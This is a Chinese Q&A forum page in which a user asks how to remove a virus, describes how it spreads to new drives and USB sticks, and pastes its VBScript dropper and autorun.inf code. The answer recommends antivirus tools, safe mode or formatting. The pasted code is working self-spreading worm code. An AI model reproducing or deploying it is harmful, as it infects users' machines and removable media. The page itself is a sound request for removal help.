如何去除一个病毒

来源:百度知道 编辑:UC知道 时间:2024/07/04 06:28:47
程序会创建三个文件:
NP.vbs
stNP.vbs
autorun.inf
删除的哗会导致硬盘无法双击打开
但是可以被开始-运行命令打开
而且程序会自动寻找新的盘符并复制自身到新的盘符里
U盘也会被感染
stNP.exe的代码
n error resume next
set fso = CreateObject("Scripting.FileSys"&"temObject")
if fso.FileExists("NP.vbs") = -1 then
if fso.FileExists("d:\NP.vbs") = -1 then
set f = fso.getfile("d:\NP.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "NP.vbs", "d:\NP.vbs", true
set wshshell = wscript.createobject("WScript.Shell")
wshshell.run "d:\NP.vbs"
end if
INF文件的代码:
[autorun]
open=
shell\open=打开(&O)
shell\open\Command=WScript.exe stNP.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe stNP.vbs

用瑞星杀毒软件试试,要求更新到最近。或是用卡巴斯基6.0。应该可以杀掉。不行就在安全模式下杀毒。

如果能启动到桌面,最好利用磁盘格式化,但这样有可能会丢失文件,但能消去病毒.
如果不能启动到桌面,最好花点钱请有经验的工作人员处理.